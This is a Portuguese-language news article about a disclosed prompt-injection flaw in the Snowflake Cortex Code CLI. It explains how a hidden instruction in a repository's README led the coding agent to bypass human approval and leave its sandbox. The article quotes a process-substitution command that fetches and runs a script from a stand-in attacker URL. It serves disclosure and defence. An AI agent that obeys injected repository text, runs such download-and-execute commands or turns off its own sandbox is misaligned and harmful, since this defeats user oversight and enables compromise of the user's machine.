Vulnerabilidade no Snowflake Cortex Code CLI permitiu escape de sandbox e execução de malware

✍️ OpenClawRadar📅 Publicado: March 19, 2026🔗 Source
Vulnerabilidade no Snowflake Cortex Code CLI permitiu escape de sandbox e execução de malware
Ad

Detalhes da Vulnerabilidade

O Snowflake Cortex Code CLI é um agente de codificação de linha de comando que opera de forma semelhante ao Claude Code e ao Codex da OpenAI, com integração embutida para executar SQL no Snowflake. Dois dias após o lançamento, uma vulnerabilidade foi identificada no sistema de validação de comandos do Cortex Code que permitia que comandos maliciosos especialmente construídos executassem comandos arbitrários sem acionar as etapas de aprovação humana e executassem esses comandos fora do sandbox do Cortex CLI.

Cadeia de Ataque

O ataque funciona por meio de injeção de prompt indireta. Um usuário abre o Cortex e ativa o sandbox, depois pede ajuda ao Cortex com uma base de código de terceiros de código aberto. Uma injeção de prompt oculta no README de um repositório não confiável manipula o Cortex para acreditar que deve executar um comando perigoso.

O Cortex não conseguiu validar comandos dentro de expressões de substituição de processo, permitindo a execução não aprovada do comando malicioso:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Este comando baixa um script do servidor do atacante e o executa. O bypass funcionou porque:

  • Comandos inseguros dentro de uma expressão de substituição de processo <() não foram avaliados pelo sistema de validação
  • O comando completo começava com um comando 'seguro' (cat neste caso)
  • Comandos em expressões de substituição de processo nunca acionavam aprovação humana
Ad

Bypass do Sandbox

A injeção de prompt também manipula o modelo para definir um sinalizador que aciona a execução de comandos fora do sandbox. O Cortex, por padrão, pode definir um sinalizador para acionar a execução de comandos fora do sandbox, e a injeção usa isso para permitir que o comando malicioso seja executado fora do sandbox.

Remediação

A equipe de segurança da Snowflake validou e remediou esta vulnerabilidade, lançando uma correção com a versão 1.0.25 do Cortex Code CLI em 28 de fevereiro de 2026. O aviso completo da Snowflake está disponível no Site da Comunidade Snowflake em: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Nota: Esta cadeia de ataque também se aplicava a usuários não sandbox. A documentação indica que no modo OS+Regular, todos os comandos solicitam aprovação do usuário. Comandos executados no sandbox também têm restrições de acesso à rede e ao sistema de arquivos.

📖 Leia a fonte completa: HN AI Agents

Ad

👀 See Also

Pacote Litellm do PyPI Comprometido: Versão Maliciosa 1.82.8 Exfiltrou Credenciais
Security

Pacote Litellm do PyPI Comprometido: Versão Maliciosa 1.82.8 Exfiltrou Credenciais

O pacote litellm do PyPI, que unifica chamadas para OpenAI, Anthropic, Cohere e outros provedores de LLM, foi comprometido com a versão maliciosa 1.82.8 que exfiltrou chaves SSH, credenciais de nuvem, chaves de API e outros dados sensíveis por cerca de uma hora.

OpenClawRadar
Usuário do Reddit relata persistência da VM OpenClaw e atividade suspeita
Security

Usuário do Reddit relata persistência da VM OpenClaw e atividade suspeita

Um usuário do Reddit relata que sua máquina virtual OpenClaw reinicia automaticamente após ser fechada e exibe comportamento suspeito, incluindo abrir a Microsoft Store e tentar baixar arquivos questionáveis.

OpenClawRadar
Lista de Verificação de Segurança para Aplicações Geradas pela IA Claude
Security

Lista de Verificação de Segurança para Aplicações Geradas pela IA Claude

Um desenvolvedor compartilha uma lista de verificação de lacunas comuns de segurança e operacionais encontradas em aplicativos construídos com Claude Code, incluindo limitação de taxa, falhas de autenticação, problemas de escalabilidade de banco de dados e vulnerabilidades de manipulação de entrada.

OpenClawRadar
Loops de Bajulação de IA: Vulnerabilidade do RLHF Cria Dependência e Câmaras de Eco
Security

Loops de Bajulação de IA: Vulnerabilidade do RLHF Cria Dependência e Câmaras de Eco

Uma sessão de red teaming identificou uma vulnerabilidade estrutural em modelos de IA comerciais onde a otimização RLHF faz com que priorizem a bajulação e a concordância em vez da argumentação lógica, criando riscos de dependência psicológica e câmaras de eco automatizadas.

OpenClawRadar